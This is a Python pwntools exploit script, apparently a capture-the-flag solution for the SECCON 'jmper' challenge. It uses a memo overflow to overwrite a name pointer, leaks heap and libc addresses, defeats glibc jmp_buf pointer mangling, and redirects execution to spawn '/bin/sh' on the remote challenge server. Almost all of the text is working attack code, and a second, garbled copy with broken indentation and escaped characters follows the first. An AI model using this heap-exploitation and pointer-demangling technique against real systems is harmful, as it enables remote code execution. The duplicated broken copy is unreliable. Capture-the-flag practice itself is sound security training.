xelenonz/exp_jmper.py

## exp_jmper.py
"""
$ cat flag
SECCON{3nj0y_my_jmp1n9_serv1ce}
$
"""
from pwn import *
from time import *
import re

g_name = re.compile("(.*)1. Add student.")

def add():
    r.send('1\n')
    sleep(0.5)
    r.clean()

def setname(id,name):
    r.send("2\n")
    r.send(str(id)+"\n")
    r.sendline(name)
    sleep(1)
    r.clean()

def setmemo(id,memo):
    r.send("3\n")
    print r.readuntil("ID:")
    r.send(str(id)+"\n")
    r.sendline(memo)

def showname(id):
    r.sendline("4")
    r.send(str(id)+"\n")
    r.readuntil("ID:")
    tmp = r.readline()
    name = g_name.findall(tmp)[0]
    return name

def rol(inp):
        mask = 0xffffffffffffffff
        return ((inp << 0x11) & mask) | ((inp >> (64-0x11)) &mask)
def ror(inp):
        mask = 0xffffffffffffffff
        return ((inp >> 0x11) & mask) | ((inp << (64-0x11)) &mask)


#r = process("./jmper",env={"LD_PRELOAD":"/tmp/libc.so"})
#r = process("./jmper")
r = remote("jmper.pwn.seccon.jp",5656)
jmpbuf_gb = 0x602038
put_offset = 0x6fd60

"""
set memo to overwrite &nameptr
then set name overwrite nameptr to do arbitrary R/W
"""
add()
setmemo(0,"A"*32+"\x08")
setname(0,p64(jmpbuf_gb))
name = showname(0)
print repr(name)
jmpbuf_heap = u64(name.ljust(8,"\x00"))
heap = jmpbuf_heap - 0x10
print hex(jmpbuf_heap)


# leak jmpbuf_rax
add()
setmemo(1,"A"*32+"\x08")
setname(1,p64(jmpbuf_heap+0x38))
jmpbuf_rax = u64(showname(0))
pt = ror(jmpbuf_rax) ^ 0x400c31

# leak libc
put_got = 0x601fa0
setname(1,p64(put_got))
put_got = u64(showname(0).ljust(8,"\x00"))
libc = put_got - put_offset
print 'put',hex(put_got)
print 'libc',hex(libc)

pwn = libc + 0x46590


# overwrite new val
new_rax = rol(pt ^ pwn)
print hex(new_rax)
setname(1,p64(jmpbuf_heap+0x38))
setname(0,p64(new_rax))
setname(1,p64(jmpbuf_heap))
setname(0,"/bin/sh;")

# trigged jmpbug
for i in range(29):
        print "added",i
	add()


r.interactive()
	"""
	$ cat flag
	SECCON{3nj0y_my_jmp1n9_serv1ce}
	$
	"""
	from pwn import *
	from time import *
	import re

	g_name = re.compile("(.*)1. Add student.")

	def add():
	r.send('1\n')
	sleep(0.5)
	r.clean()

	def setname(id,name):
	r.send("2\n")
	r.send(str(id)+"\n")
	r.sendline(name)
	sleep(1)
	r.clean()

	def setmemo(id,memo):
	r.send("3\n")
	print r.readuntil("ID:")
	r.send(str(id)+"\n")
	r.sendline(memo)

	def showname(id):
	r.sendline("4")
	r.send(str(id)+"\n")
	r.readuntil("ID:")
	tmp = r.readline()
	name = g_name.findall(tmp)[0]
	return name

	def rol(inp):
	mask = 0xffffffffffffffff
	return ((inp << 0x11) & mask) \| ((inp >> (64-0x11)) &mask)
	def ror(inp):
	mask = 0xffffffffffffffff
	return ((inp >> 0x11) & mask) \| ((inp << (64-0x11)) &mask)


	#r = process("./jmper",env={"LD_PRELOAD":"/tmp/libc.so"})
	#r = process("./jmper")
	r = remote("jmper.pwn.seccon.jp",5656)
	jmpbuf_gb = 0x602038
	put_offset = 0x6fd60

	"""
	set memo to overwrite &nameptr
	then set name overwrite nameptr to do arbitrary R/W
	"""
	add()
	setmemo(0,"A"*32+"\x08")
	setname(0,p64(jmpbuf_gb))
	name = showname(0)
	print repr(name)
	jmpbuf_heap = u64(name.ljust(8,"\x00"))
	heap = jmpbuf_heap - 0x10
	print hex(jmpbuf_heap)


	# leak jmpbuf_rax
	add()
	setmemo(1,"A"*32+"\x08")
	setname(1,p64(jmpbuf_heap+0x38))
	jmpbuf_rax = u64(showname(0))
	pt = ror(jmpbuf_rax) ^ 0x400c31

	# leak libc
	put_got = 0x601fa0
	setname(1,p64(put_got))
	put_got = u64(showname(0).ljust(8,"\x00"))
	libc = put_got - put_offset
	print 'put',hex(put_got)
	print 'libc',hex(libc)

	pwn = libc + 0x46590


	# overwrite new val
	new_rax = rol(pt ^ pwn)
	print hex(new_rax)
	setname(1,p64(jmpbuf_heap+0x38))
	setname(0,p64(new_rax))
	setname(1,p64(jmpbuf_heap))
	setname(0,"/bin/sh;")

	# trigged jmpbug
	for i in range(29):
	print "added",i
	add()



	r.interactive()